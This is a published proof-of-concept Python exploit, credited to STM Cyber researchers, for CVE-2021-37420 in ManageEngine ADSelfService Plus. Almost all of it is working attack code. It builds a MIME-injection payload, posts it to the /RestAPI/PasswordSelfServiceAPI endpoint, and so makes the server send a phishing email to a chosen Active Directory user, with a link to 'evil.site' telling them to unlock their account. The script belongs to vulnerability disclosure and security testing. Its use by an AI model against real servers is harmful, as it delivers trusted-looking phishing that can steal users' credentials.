#
# STM Cyber R&D
# https://blog.stmcyber.com
#
# Exploit Title: ManageEngine ADSelfService Plus - E-mail MIME injection in /RestAPI/PasswordSelfServiceAPI endpoint
# Exploit Author: Krzysztof Andrusiak, Marcin Ogorzelski
# Vendor Homepage: https://www.manageengine.com/
# Software Link: https://www.manageengine.com/products/self-service-password/download.html
# Version: < 6112
# Tested on: Windows Server 2019
# CVE: CVE-2021-37420

import requests

URL = "http://192.168.100.102:8888" # ADSSP server
DOMAIN = "ALPHACORP.LOCAL" # Domain name
USERNAME = "victim" # AD username (e-mail recipient)
HTML_CONTENT = f"<p>Hello {USERNAME},</p><p>click <a href=\"https://evil.site\">here</a> to unlock your account.</p><p>Best regards,</p><p>Administrator</p>" # Mail content

def get_payload_html(html):
    payload = ""
    payload += 'Content-Type: text/html;charset=UTF-8\n'
    payload += 'Content-Transfer-Encoding: 7bit\n'
    payload += '\n'
    payload += html.replace('\r', '').replace('\n', '<br>')
    payload += '\n\n'

    return payload

def get_payload(html):
    payload = '\n'
    payload += 'MIME-Version: 1.0\n'
    payload += 'Content-Type: multipart/mixed; boundary="----=_Part_164_38720369.1615548866509"\n\n'
    payload += '------=_Part_164_38720369.1615548866509\n'
    payload += get_payload_html(html)
    payload += '------=_Part_164_38720369.1615548866509--\n'

    return payload

params = {
    "operation": "selfServiceApproval",
    "DOMAIN_NAME": DOMAIN,
    "USERNAME": USERNAME,
    "ACTION_TO_PERFORM": get_payload(HTML_CONTENT)
}

print(f"[*] Sending phishing e-mail to {USERNAME} user.")
r = requests.post(URL.rstrip('/') + "/RestAPI/PasswordSelfServiceAPI", data=params)

if r.text.strip() == "adssp.common.text.mail_sent_success":
    print("[+] Done.")
elif r.text.strip() == "adssp.common.text.unable_send_notification":
    print("[-] Unable to send notification - does user have e-mail set in AD?")
else:
    print("[-] Something went wrong.")